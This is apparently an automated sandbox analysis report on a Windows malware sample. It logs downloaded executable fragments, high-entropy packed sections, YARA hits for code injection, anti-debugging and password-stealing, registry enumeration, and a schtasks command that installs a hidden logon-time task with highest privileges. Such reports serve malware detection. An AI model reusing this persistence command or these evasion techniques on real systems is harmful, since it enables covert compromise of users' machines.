InternetReadFile Feb. 20, 2024, 7:51 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELÛÙÓeà"¬ RwÀ @`àí@@@d\|@ à uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 20, 2024, 7:51 a.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ `D `@ D%`m`ø @ @à.rsrc`2@À.idata 6@À À) 8@àvawptuez`*ì:@àlumgmzfl `D&@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 20, 2024, 7:51 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELþ~Ìeà"¬>ô±À@²@ Ðàßx Ð°4@àpÀ"8@à@0Z@àpb@àdb@à.rsrcÆ@@y (Ô @à.datap" j"ü@àGj_ú§fa¡+ÌKz0 6 ï: ÷dwj Ô+ þêgËoKfÅL6$ù7ië¡î¤`;M>å'j¼r>ÂÌwrñml£ÌÎÍ]CÉé.ïß2È±nÃÆ°^Pmª ¹A9ÅDü±^uÙ9ÄÄf)@Ì}ßæ"fQý¨ÇëdèÓ,nCO d:{oÚB¿ÙpÅEXpoS¼Þ,qnKy%Çñæè{'¡±åDä/X¨OhÃEUïe=%×7\|F<Â)Üb·Ò&ïð ÂM¹NÍQÎ/¶2âbB\ÊQW_ñ¸% öbAíQg~Ìw¤hð+)6¹»ÜYêô[»w2 Õ .Jðö¾e ék\Èü«hdê+tÚÃCJ"ËA½b\|uÀºX]¹h¸cÚFÖÝ DmãèÂLÎYÀ²ÍKçïáÜqÐ7EZÔ1MóujqÝÚÉ/FQ;FÐFÚTì±¡×6³ùÿÚÉeuLq·A¨Ó4I[£ªá0ÀÙ8p:°ó .tàº½Q¯&mSýûì[+½ÃÜ¢ØöýªØ¿ÿÕÐãË!¥¶§²/i±ÚÌ>BBWrÓ¡nãyA°ãCpÓ~GÓÂ¦:ÛuÝô<L³M R1M¡WÏSul£~&c8BôßÜ¿$ß4ôJ2ºVoÁ<ÖT´S7þe¤êXÚ4dg¯aTÔÁúPy>sùù/=Û-9ò/÷rÛg7déUPTN$à´jöHå~?Ôï%Ø¨kAhÐÄ^YÝÒv)Pd¬õ$)ÃÖáACÆD,dD"(Â3Þ¤®¶vúmxs¼ÔéþqÐ'R2CÔf«C IÄÅÄØp]×ÞÊvÄ?º}Ú®Öz³T±3Õû½kè¼ÃîË #Ã ÷ôþ-G±Uh8üµ6Wêdf!ï¦×íREøÀdS÷æNìÈ:I/ò5ð°ïÿÃ!¨ÑáL`ü³X¤tÄåPïâÆ,<j»ÿÓëpy *¡uS³j r'¥ mQ©hBgýc1zRÿí2><WKSbÑÁQdE\|À=EBP&Í±oÛCk¾Q`00 ÖØ\úÊº;M<ñÓØæü¬'ÜK#d7FÍ`Q\|ùÌ Üº M¼[$F[R request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 20, 2024, 7:52 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELÝÙÓeà"¬ wÀ @0î@@@d\|@ \|a°uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc\|a@ bô@@.relocu°vV@B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 20, 2024, 7:52 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"V]°@0]ïV%@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À -À @àcqbzajct°@A° @àtviqsaupð\¾$@à.taggant0]"Â$@à request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (4 events)

section

{u'size_of_data': u'0x0008f000', u'virtual_address': u'0x00001000', u'entropy': 7.98883302448081, u'name': u' \\x00 ', u'virtual_size': u'0x00136000'}

entropy

7.98883302448

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00002000', u'virtual_address': u'0x00137000', u'entropy': 7.902596502928976, u'name': u'.rsrc', u'virtual_size': u'0x000110a0'}

entropy

7.90259650293

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001b5a00', u'virtual_address': u'0x0040c000', u'entropy': 7.913857553386716, u'name': u'rhfejcgk', u'virtual_size': u'0x001b6000'}

entropy

7.91385755339

description

A section with a high entropy has been found

entropy

0.995302156737

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 20, 2024, 7:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (50 out of 1131 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c
url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	https://codereview.chromium.org/25305002).
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	http://crbug.com/320723
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03

Yara rule detected in process memory (50 out of 1398 events)

description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x000004e8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004e8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x000004e8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 20, 2024, 7:51 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
